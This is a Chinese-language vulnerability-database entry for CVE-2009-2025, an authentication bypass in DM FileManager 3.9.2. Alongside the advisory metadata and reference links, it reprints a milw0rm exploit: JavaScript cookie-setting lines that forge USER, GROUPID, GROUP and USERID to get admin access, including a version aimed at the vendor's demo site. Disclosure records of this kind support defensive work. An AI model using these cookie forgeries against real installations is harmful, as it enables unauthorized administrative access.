DM FileManager 'admin/login.php'认证绕过和权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117916 漏洞类型 权限许可和访问控制
发布时间 2009-06-08 更新时间 2009-06-08
CVE编号 CVE-2009-2025 CNNVD-ID CNNVD-200906-136
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8903
https://www.securityfocus.com/bid/44396
https://cxsecurity.com/issue/WLB-2009060137
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-136
|漏洞详情
DMFileManager3.9.2版本的admin/login.php允许远程攻击者通过把(1)USER,(2)GROUPID,(3)GROUP,以及(4)USERIDcookies设置成某一值,绕过权限并获得管理访问权。
|漏洞EXP
DM FileManager 3.9.2 Insecure Cookie Handling Vuln
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://dutchmonkey.com
Special Thx: Snakespc
Note: Algerie 3-1 Egypt
Exploit:
------
javascript:document.cookie="USER=[user name ];path=/";
javascript:document.cookie="GROUPID=1;path=/";
javascript:document.cookie="GROUP=[Groupe of user];path=/";
javascript:document.cookie="USERID=[user_id];path=path=/";
Then Go to Url /admin.php
Demo:
----
http://dutchmonkey.com/products/dm-filemanager/demo/admin/login.php
Exp for demo:
------------
javascript:document.cookie="USER=GUEST;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="GROUPID=1;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="GROUP=ADMINISTRATORS;path=/products/dm-filemanager/demo/admin/";
javascript:document.cookie="USERID=51;path=/products/dm-filemanager/demo/admin/";
Note: ALgerie en Coupe Du Monde In shaa ALLAH
################################################################################################

# milw0rm.com [2009-06-08]
|受影响的产品
DutchMonkey DM FileManager 3.9.2
|参考资料

来源:VUPEN
名称:ADV-2009-1532
链接:http://www.vupen.com/english/advisories/2009/1532
来源:MILW0RM
名称:8903
链接:http://www.milw0rm.com/exploits/8903
来源:SECUNIA
名称:35167
链接:http://secunia.com/advisories/35167